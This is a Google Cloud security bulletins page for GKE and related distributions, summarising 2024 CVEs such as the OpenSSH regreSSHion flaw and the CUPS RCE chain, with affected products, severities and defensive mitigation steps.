All security bulletins for the following products are described in this page:
- Google Kubernetes Engine (GKE)
- Google Distributed Cloud (software only) on VMware
- GKE on AWS
- GKE on Azure
- Google Distributed Cloud (software only) on bare metal
Vulnerabilities are often kept secret under embargo until affected parties have had a chance to address them. In these cases, the product's release notes will refer to "security updates" until the embargo has been lifted. At that point the notes will be updated to reflect the vulnerability the patch addressed.
When GKE issues a security bulletin that directly correlates to
your cluster configuration or version, we might send you a SecurityBulletinEvent
cluster notification that provides information about the vulnerability and actions
that you can take, if applicable. For information about setting up cluster
notifications, refer to Cluster notifications.
For more information on how Google manages security vulnerabilities and patches for GKE and GKE Enterprise, see Security patching.
GKE and GKE Enterprise platforms don't use components
such as ingress-nginx
and the CRI-O container runtime, and are unaffected
by any vulnerabilities in those components. If you install components from
other sources, refer to the security updates and patching advice of those
components at the source.
Use this XML feed to subscribe to security bulletins for this page.
GCP-2024-057
Published: 2024-10-03
Updated: 2024-11-19
Reference:
CVE-2024-45016
2024-11-19 Update: Added patch versions for Ubuntu node pools on GKE.
2024-10-15 Update: Added patch versions for GDC (VMware). Updated GDC (VMware) severity from Pending to Medium. Updated GKE severity from High to Medium.
GKE
Updated: 2024-11-19
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?2024-11-19 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
Medium |
GDC (VMware)
Updated: 2024-10-15
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?2024-10-15 Update: The following versions of GDC (VMware) are updated with code to fix this vulnerability. Upgrade your GDC (VMware) clusters to the following versions or later:
|
Medium |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-056
Published: 2024-09-27
Reference: CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, CVE-2024-47177
GKE
Description | Severity |
---|---|
A vulnerability chain (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, CVE-2024-47177) that could result in remote code execution was discovered in the CUPS printing system used by some Linux distributions. An attacker can exploit this vulnerability if the CUPS services are listening on UDP port 631 and they can connect to it. GKE does not use the CUPS printing system and is not affected. What should I do?No action required |
None |
GDC (VMware)
Description | Severity |
---|---|
A vulnerability chain (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, CVE-2024-47177) that could result in remote code execution was discovered in the CUPS printing system used by some Linux distributions. An attacker can exploit this vulnerability if the CUPS services are listening on UDP port 631 and they can connect to it. GDC software for VMware does not use the CUPS printing system and is not affected. What should I do?No action required |
None |
GKE on AWS
Description | Severity |
---|---|
A vulnerability chain (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, CVE-2024-47177) that could result in remote code execution was discovered in the CUPS printing system used by some Linux distributions. An attacker can exploit this vulnerability if the CUPS services are listening on UDP port 631 and they can connect to it. GKE on AWS does not use the CUPS printing system and is not affected. What should I do?No action required |
None |
GKE on Azure
Description | Severity |
---|---|
A vulnerability chain (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, CVE-2024-47177) that could result in remote code execution was discovered in the CUPS printing system used by some Linux distributions. An attacker can exploit this vulnerability if the CUPS services are listening on UDP port 631 and they can connect to it. GKE on Azure does not use the CUPS printing system and is not affected. What should I do?No action required |
None |
GDC (bare metal)
Description | Severity |
---|---|
A vulnerability chain (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, CVE-2024-47177) that could result in remote code execution was discovered in the CUPS printing system used by some Linux distributions. An attacker can exploit this vulnerability if the CUPS services are listening on UDP port 631 and they can connect to it. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. What should I do?No action required |
None |
GCP-2024-054
Published: 2024-09-23
Reference: CVE-2024-5321
GKE
Description | Severity |
---|---|
A security issue was discovered in Kubernetes clusters with Windows nodes where
Any Kubernetes environment with Windows nodes is affected. Run
Affected GKE versions
What should I do?The following versions of GKE have been updated to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and node pools to one of the following GKE versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. What vulnerabilities are being addressed?CVE-2024-5321 |
Medium |
GDC (VMware)
Description | Severity |
---|---|
A security issue was discovered in Kubernetes clusters with Windows
nodes where Any Kubernetes environment with Windows nodes is affected. Run
What should I do?Patch versions for GDC software for VMware are in progress. We'll update this bulletin with that information when it's available. What vulnerabilities are being addressed?CVE-2024-5321 |
Medium |
GKE on AWS
Description | Severity |
---|---|
A security issue was discovered in Kubernetes clusters with Windows nodes
where GKE on AWS clusters do not support Windows nodes and are not affected. What should I do?No action required
|
None |
GKE on Azure
Description | Severity |
---|---|
A security issue was discovered in Kubernetes clusters with Windows nodes
where GKE on Azure clusters do not support Windows nodes and are not affected. What should I do?No action required |
None |
GDC (bare metal)
Description | Severity |
---|---|
A security issue was discovered in Kubernetes clusters with Windows nodes
where GDC software for bare metal clusters do not support Windows nodes and are not affected. What should I do?No action required |
None |
GCP-2024-050
Published: 2024-09-04
Reference: CVE-2024-38063
GKE
Description | Severity |
---|---|
A new remote code execution vulnerability (CVE-2024-38063) has been discovered in Windows. An attacker could remotely exploit this vulnerability by sending specially crafted IPv6 packets to a host. What should I do?GKE does not support IPv6 on windows and is not affected by this CVE. No action is required. |
None |
GDC (VMware)
Description | Severity |
---|---|
A new remote code execution vulnerability (CVE-2024-38063) has been discovered in Windows. An attacker could remotely exploit this vulnerability by sending specially crafted IPv6 packets to a host. What should I do?GDC software for VMware does not support IPv6 on windows and is not affected by this CVE. No action is required. |
None |
GKE on AWS
Description | Severity |
---|---|
A new remote code execution vulnerability (CVE-2024-38063) has been discovered in Windows. An attacker could remotely exploit this vulnerability by sending specially crafted IPv6 packets to a host. What should I do?GKE on AWS is not affected by this CVE. No action is required. |
None |
GKE on Azure
Description | Severity |
---|---|
A new remote code execution vulnerability (CVE-2024-38063) has been discovered in Windows. An attacker could remotely exploit this vulnerability by sending specially crafted IPv6 packets to a host. What should I do?GKE on Azure is not affected by this CVE. No action is required. |
None |
GDC (bare metal)
Description | Severity |
---|---|
A new remote code execution vulnerability (CVE-2024-38063) has been discovered in Windows. An attacker could remotely exploit this vulnerability by sending specially crafted IPv6 packets to a host. What should I do?GDC (bare metal) isn't affected by this CVE. No action is required. |
None |
GCP-2024-049
Published: 2024-08-21
Updated: 2024-11-01
Reference:
CVE-2024-36978
2024-11-01 Update: Added patch versions for Ubuntu node pools on GKE.
2024-10-21 Update: Added patch versions and updated Severity for GDC (VMware).
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?2024-11-01 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Updated: 2024-10-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?2024-10-21 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
High |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-048
Published: 2024-08-20
Updated: 2024-10-30
Reference:
CVE-2024-41009
2024-10-30 Update: Added patch versions for Ubuntu node pools on GKE.
2024-10-25 Update: Added patch versions and updated Severity for GDC (VMware).
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted. What should I do?2024-10-30 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Updated: 2024-10-25
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?2024-10-25 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
High |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-047
Published: 2024-08-19
Updated: 2024-10-30
Reference:
CVE-2024-39503
2024-10-30 Update: Added patch versions for Ubuntu node pools on GKE.
2024-10-21 Update: Added patch versions and updated Severity for GDC (VMware).
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?2024-10-30 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Updated: 2024-10-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?2024-10-21 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
High |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-045
Published: 2024-07-17
Updated: 2024-09-19
Reference:
CVE-2024-26925
2024-09-19 Update: Added patch versions for GDC (VMware).
2024-08-21 Update: Added patch versions for Ubuntu node pools on GKE.
GKE
Updated: 2024-08-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?2024-08-21 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Updated: 2024-09-19
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?2024-09-19 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-044
Published: 2024-07-16
Updated: 2024-10-30
Reference:
CVE-2024-36972
2024-10-30 Update: Added patch versions for Ubuntu node pools on GKE.
2024-10-21 Update: Added patch versions and updated Severity for GDC (VMware).
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted. What should I do?2024-10-30 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Updated: 2024-10-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?2024-10-21 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
High |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-043
Published: 2024-07-16
Updated: 2024-10-02
Reference:
CVE-2024-26921
2024-10-02 Update: Added patch versions for Ubuntu node pools on GKE.
2024-09-20 Update: Added patch versions for GDC (VMware).
GKE
Updated: 2024-10-02
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?2024-10-02 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Updated: 2024-09-20
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?2024-09-20 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-042
Published: 2024-07-15
Updated: 2024-07-18
Reference:
CVE-2024-26809
2024-07-18 Update: Clarified that Autopilot clusters in the default configuration aren't impacted.
GKE
Updated: 2024-07-18
Description | Severity |
---|---|
2024-07-18 Update: The original version of this bulletin incorrectly
stated that Autopilot clusters were impacted. Autopilot clusters in the
default configuration aren't impacted, but might be vulnerable if you explicitly
set the seccomp Unconfined profile or allow the The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted. What should I do?The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-041
Published: 2024-07-08
Updated: 2024-09-16
Reference:
CVE-2023-52654, CVE-2023-52656
2024-09-16 Update: Added patch versions for GDC (VMware).
2024-07-19 Update: Added patch versions for Ubuntu node pools on GKE.
GKE
Updated: 2024-07-19
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted. What should I do?2024-07-19 Update: The following versions of GKE contain code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Updated: 2024-09-16
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?2024-09-16 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-040
Published: 2024-07-01
Updated: 2024-07-11
Reference:
CVE-2024-6387
2024-07-11 Update: Added patch versions for GDC software for VMware, GKE on AWS, and GKE on Azure.
2024-07-03 Update: Added patch versions for GKE
2024-07-02 Updates:
- Clarified that Autopilot clusters are impacted and will require user action.
- Added impact assessments and mitigation steps for GDC (VMware), GKE on AWS, and GKE on Azure.
- Corrected the GDC (bare metal) security bulletin to clarify that GDC (bare metal) isn't directly affected and that customers should check with OS vendors for patches.
GKE
Updated: 2024-07-03
Description | Severity |
---|---|
2024-07-03 Update: An expedited rollout is in progress and is expected to make new patch versions available across all zones by July 3, 2024 at 5 PM US and Canadian Pacific Daylight Time (UTC-7). To get a notification as soon as a patch is available for your specific cluster, use cluster notifications. 2024-07-02 Update: This vulnerability affects both Autopilot mode and Standard mode clusters. Each section that follows will tell you the modes to which that section applies. A remote code execution vulnerability, CVE-2024-6387, was recently discovered in OpenSSH. The vulnerability exploits a race condition that could be used to obtain access to a remote shell, enabling attackers to gain root access to GKE nodes. At the time of publication, exploitation is believed to be difficult and take several hours per machine being attacked. We are not aware of any exploitation attempts. All supported versions of Container Optimized OS and Ubuntu images on GKE run versions of OpenSSH that are vulnerable to this issue. GKE clusters with public node IP addresses and SSH exposed to the Internet should be treated with the highest priority for mitigation. The GKE control plane is not vulnerable to this issue. What should I do?2024-07-03 Update: Patch versions for GKEAn expedited rollout is in progress and is expected to make new patch versions available across all zones by July 3, 2024 at 5 PM US and Canadian Pacific Daylight Time (UTC-7). Clusters and nodes with autoupgrade enabled will begin upgrading as the week progresses, but due to the severity of the vulnerability we recommend upgrading manually as follows to get patches as fast as possible. For both Autopilot and Standard clusters, upgrade your control plane to a patched version. Additionally, for Standard mode clusters, upgrade your node pools to a patched version. Autopilot clusters will begin upgrading your nodes to match the control plane version as soon as possible. Patched GKE versions are available for every supported version to minimize the changes necessary to apply the patch. The version number of each new version is an increment on the final digit in the version number of a corresponding existing version. For example, if you are on 1.27.14-gke.1100000, you will upgrade to 1.27.14-gke.1100002 to get the fix with the smallest possible change. The following patched GKE versions are available:
To check whether a patch is available in your cluster zone or region, run the following command: gcloud container get-server-config --location=
Replace 2024-07-02 Update: Both Autopilot mode and Standard mode clusters should be upgraded as soon as possible after patch versions are available. A patched GKE version that includes an updated OpenSSH will be made available as soon as possible. This bulletin will be updated when patches are available. To receive a Pub/Sub notification when a patch is available for your channel, enable cluster notifications. We recommend working through the following steps to check your cluster's exposure, and applying the mitigations described, as necessary. Determine whether your nodes have public IP addresses2024-07-02 Update: This section applies to both Autopilot and Standard clusters. If a cluster is created with
gcloud container clusters describe $CLUSTER_NAME \ --format="value(privateClusterConfig.enablePrivateNodes)" If the return value is True, all nodes are private nodes for this cluster and the vulnerability is mitigated. If the value is empty or false, continue on to apply one of the mitigations in the following sections. To find all clusters originally created with public nodes, use this Cloud Asset Inventory query in the project or organization: SELECT resource.data.name AS cluster_name, resource.parent AS project_name, resource.data.privateClusterConfig.enablePrivateNodes FROM `container_googleapis_com_Cluster` WHERE resource.data.privateClusterConfig.enablePrivateNodes is null OR resource.data.privateClusterConfig.enablePrivateNodes = false Disallow SSH to the cluster nodes2024-07-02 Update: This section applies to both Autopilot and Standard clusters. The default network is pre-populated with a
If you have created any other firewall rules that may allow SSH through TCP on port 22, disable them, or limit the source IPs to trusted networks. Verify that you can no longer SSH to the cluster nodes from the Internet. This firewall configuration mitigates the vulnerability. Convert public node pools to private2024-07-02 Update: For Autopilot clusters originally created as public clusters, you can place your workloads on private nodes by using nodeSelectors. However, Autopilot nodes that run system workloads on clusters that were originally created as public clusters will still be public nodes and should be protected by using the firewall changes described in the preceding section. To best protect clusters originally created with public nodes, we recommend first disallowing SSH through the firewall as already described. If you are not able to disallow SSH through the firewall rules, you can convert public node pools on GKE Standard clusters to private by following this guidance to isolate node pools. Change SSHD configuration2024-07-02 Update: This section only applies to Standard clusters. Autopilot workloads aren't allowed to modify node configuration. If none of these mitigations can be applied, we have also published a daemonset
that sets SSHD |
Critical |
GDC (VMware)
Updated: 2024-07-11
Description | Severity |
---|---|
2024-07-11 Update: The following versions of GDC software for VMware have been updated with code to fix this vulnerability. Upgrade your admin workstation, admin clusters, and user clusters (including node pools) to one of the following versions or later. For instructions, see Upgrade a cluster or node pool.
The 2024-07-02 update to this bulletin incorrectly stated that all supported versions of Ubuntu images on GDC software for VMware run versions of OpenSSH that are vulnerable to this issue. Ubuntu images on GDC software for VMware version 1.16 clusters run versions of OpenSSH that are not vulnerable to this issue. Ubuntu images in GDC software for VMware 1.28 and 1.29 are vulnerable. Container-Optimized OS images on all supported versions of GDC software for VMware are vulnerable to this issue. 2024-07-02 Update: All supported versions of Container-Optimized OS and Ubuntu images on GDC software for VMware run versions of OpenSSH that are vulnerable to this issue. GDC software for VMware clusters with public node IP addresses and SSH exposed to the Internet should be treated with the highest priority for mitigation. A remote code execution vulnerability, CVE-2024-6387, was recently discovered in OpenSSH. The vulnerability exploits a race condition that could be used to obtain access to a remote shell, enabling attackers to gain root access to GKE nodes. At the time of publication, exploitation is believed to be difficult and take several hours per machine being attacked. We are not aware of any exploitation attempts. What should I do?2024-07-02 Update: A patched GDC software for VMware version that includes an updated OpenSSH will be made available as soon as possible. This bulletin will be updated when patches are available. We recommend that you apply the following mitigations as necessary. Disallow SSH to the cluster nodesYou can change your infrastructure network setup to disallow SSH connectivity from untrusted sources, such as the public Internet. Change sshd configurationIf you can't apply the preceding mitigation, we have
published a DaemonSet
that sets the sshd |
Critical |
GKE on AWS
Updated: 2024-07-11
Description | Severity |
---|---|
2024-07-11 Update: The following versions of GKE on AWS have been updated with code to fix this vulnerability:
Upgrade your GKE on AWS control plane and node pools to one of these patched versions or later. For instructions, see Upgrade your AWS cluster version and Update a node pool. 2024-07-02 Update: All supported versions of Ubuntu images on GKE on AWS run versions of OpenSSH that are vulnerable to this issue. GKE on AWS clusters with public node IP addresses and SSH exposed to the Internet should be treated with the highest priority for mitigation. A remote code execution vulnerability, CVE-2024-6387, was recently discovered in OpenSSH. The vulnerability exploits a race condition that could be used to obtain access to a remote shell, enabling attackers to gain root access to GKE nodes. At the time of publication, exploitation is believed to be difficult and take several hours per machine being attacked. We are not aware of any exploitation attempts. What should I do?2024-07-02 Update: A patched GKE on AWS version that includes an updated OpenSSH will be made available as soon as possible. This bulletin will be updated when patches are available. We recommend that you work through the following steps to check your cluster's exposure, and apply the described mitigations as necessary. Determine whether your nodes have public IP addressesGKE on AWS doesn't provision any machine with either public IP addresses or with firewall rules that allow traffic to port 22 by default. However, depending on your subnet configuration, machines can automatically get a public IP address during provisioning. To check whether nodes are provisioned with public IP addresses, look at the configuration of the subnet that's associated with your AWS node pool resource. Disallow SSH to the cluster nodesEven though GKE on AWS doesn't allow traffic on port 22 on any node by default, customers can attach additional security groups to node pools, enabling inbound SSH traffic. We recommend that you remove or scope down corresponding rules from the provided security groups. Convert public node pools to privateTo best protect clusters with public nodes, we recommend first disallowing SSH through your security group, as described in the previous section. If you can't disallow SSH through the security group rules, you can convert public node pools to private by disabling the option to automatically assign public IPs to machines within a subnet and reprovisioning the node pool. |
Critical |
GKE on Azure
Updated: 2024-07-11
Description | Severity |
---|---|
2024-07-11 Update: The following versions of GKE on Azure have been updated with code to fix this vulnerability:
